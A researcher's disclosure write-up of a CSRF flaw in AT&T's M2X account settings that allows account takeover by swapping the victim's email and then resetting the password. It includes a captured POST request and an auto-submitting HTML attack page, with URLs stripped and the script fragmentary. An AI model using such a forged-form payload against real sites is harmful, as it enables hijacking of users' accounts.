AT&T : From CSRF to Full Takeover Account of any user

This is the PoC i sent to AT&T

I’ve found a CSRF bug that may lead to full takeover account of a M2X AT&T user account
These are the steps to reproduce the issue:
1)Login into

2)Once logged in we have to go to
In this page we can see “First Name”,”Last Name”,”Email” forms.If we try to change the values of these forms and subsequently click
on the “Save Changes” button a POST request like this will be generated with no anti-CSRF token:


User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: mycookies
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115


There is no anti-CSRF token so it’s vulnerable to CSRF.So now i can create an ad-hoc HTML page like the following to set the value of the
“email” parameter with the email of the attacker.Once the victim has visited the HTML page,the new attacker’s email will be saved in the
victim account and subsequently the attacker could make a Reset password at this page
So now an email will be sent to the attacker’s email and now the attacker can reset password of the victim’s account.

This is the CSRF Final POC:

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>

<title>How i  Hacked AT&T</title>

<body onload=”javascript:fireForms()”>
<script language=”JavaScript”>
var pauses = new Array( “1824” );

function pausecomp(millis)
var date = new Date();
var curDate = null;

do { curDate = new Date(); }
while(curDate-date < millis);

function fireForms()
var count = 1;
var i=0;

for(i=0; i<count; i++)


<H2>How i  Hacked AT&T</H2>
<form method=”POST” name=”form0″ action=””>
<input type=”hidden” name=”first_name” value=”marco1″/>
<input type=”hidden” name=”last_name” value=”cariddi”/>
<input type=”hidden” name=”email” value=””/>
<input type=”hidden” name=”current_password” value=””/>
<input type=”hidden” name=”password” value=””/>
<input type=”hidden” name=”password_confirmation” value=””/>